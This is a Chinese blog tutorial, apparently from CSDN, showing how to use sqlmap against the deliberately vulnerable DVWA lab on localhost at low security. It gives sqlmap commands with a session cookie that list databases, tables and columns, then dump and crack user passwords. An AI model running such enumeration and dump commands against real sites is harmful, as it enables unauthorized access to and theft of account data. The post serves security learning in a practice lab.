SQLmap注入练习——dvwa

最新推荐文章于 2024-05-12 12:02:22 发布
最新推荐文章于 2024-05-12 12:02:22 发布
阅读量1.7k 收藏 7
点赞数 5
分类专栏: SQLmap注入练习——dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicesa/article/details/105519737
版权

SQLmap注入练习——dvwa

记录一下自己学习的知识点

最近自己一直在学习使用kali,今天我就用kali中的sqlmap演示一下sql注入
我就从dvwa的low级别开始演示,其实同样的操作在medium和high级别也同样能够实现注入

GET提交参数

通过表单或者F12 观察网络模块,我们可以发现dvwa的low级别是GET提交参数,当然也可以通过burpsuite截断来观察。
在这里插入图片描述

提取cookie

因为dvwa需要登录后才能提交参数,所以我们要通过cookie来跑sqlmap,直接F12提取cookie
在这里插入图片描述

爆数据库名

sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" --dbs

如图得到数据库名字

在这里插入图片描述

爆表名

因为我们是dvwa,所以数据库名选择dvwa,然后爆dvwa的表名

sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" -D dvwa --tables

如图得到dvwa中的表名
在这里插入图片描述
我们肯定是对users感兴趣啊,要的就是账号和密码,所以接下来爆users中的列名

爆列名

sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" -D dvwa --T users --columns

得到列名如下,我们感兴趣的是user和password
在这里插入图片描述

爆账号和密码

接下来就是爆user和password中的数据了,这里我想说的是,你可以在爆数据的时候直接MD5解密,到时候会有选项提示,问你是否用kali中自带的字典进行解密

sqlmap - u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie "security=low; PHPSESSID=2e7f961f6c63f146de8769778081627f" -D dvwa --T users -C user,password --dump

最终得到账号和密码,达到目的
在这里插入图片描述
以上过程就是用sqlmap自动注入的过程,自己可以多练练,至于medium和high级别的道理是一样的,最好自己去尝试一下

怪味巧克力
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
sqlmap注入漏洞测试
02-22
SQLMap 注入漏洞测试 在 Web 应用程序中, SQL 注入是一种常见的安全漏洞,它可以让攻击者访问和控制数据库中的敏感数据。SQLMap 是一款自动化SQL 注入工具,它可以检测和利用 SQL 注入漏洞,以获取数据库中的...
Sqlmap
mumuzi2的博客
02-25 387
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
DVWA——Sqlmap练习
未完成的歌~的博客
09-28 360
当使用 Sqlmap 对一个注入点是进行了测试时,可以使用 -v x 参数指定回显信息的复杂度,x属于[0~6]: 共有 7 个等级,默认为 1: 0:只显示python错误以及严重的信息。 1:同时显示基本信息和警告信息。(默认) 2:同时显示debug信息。 3:同时显示注入的payload。 4:同时显示HTTP请求。 5:同时显示HTTP响应头。 6:同时显示HTTP响应页面。 如果想看到 Sqlmap 发送的测试 payload 最好的等级就是3,例: python sqlmap.py -v
DVWA通过攻略之SQL注入_dvwa sql注入
最新发布
2401_84968371的博客
05-12 1139
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
欢迎来到训练场,SQL注入DVWA靶机
sinat_35855737的博客
05-11 994
手把手带你飞,在DVWA靶机上练习sql注入
DVWA下载、安装、使用(漏洞测试环境搭建)教程
热门推荐
星如雨落
10-27 4万+
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 一共有十个模块: 暴力(破解)、命令行注入、跨站请求伪造、文件包含、文件上传、不安全的验证码、SQL注入SQL盲注、弱会话ID、XSS漏洞(DOM型跨站脚本、反射型跨站脚本、 存储型跨站脚本) 环境搭建 由于是本地搭建真实web漏洞网站,我就以Windows
DVWA的安装教程和通关详解
路baby的博客
11-27 3万+
DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的Web漏洞。有详细的DVWA的安装教程,和通关详解
sqlmap注入神器
12-30
sqlmap是一款注入神器,灵活的运作它将是你更有效率的完成工作
SQLmap注入工具
09-20
sqlmap是一个自动化SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, ...
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
DVWA通关攻略零到一【全】
WX公众号-小白学安全
10-28 4万+
DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
DVWA靶场教程
wxh的博客
01-15 2万+
Burt Force(暴力破解)
DVWA简介及安装
qq_54727885的博客
11-26 7934
DVWA简介: DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA 一共包含了十个攻击模块,分别是:Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请求伪造)、- File Inclusion(文件包含)、File Upload(文件上传)、Ins
自学渗透测试:使用 DVWASQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 2547
SQL注入漏洞
【渗透测试】|sqlmap工具注入-基于dvwasql injection
yangdan_jiayou的博客
03-27 625
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
SQLMAP注入DVWA实战
m0_62636343的博客
05-12 2170
SQLMAP注入DVWA
sqlmap基础练习
hcufo的博客
05-15 146
一个小白的一次sqlmap使用练习过程
dvwa爆数据库andsqlmap爆数据库
2301_77315080的博客
08-28 437
正常提交payload为1。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值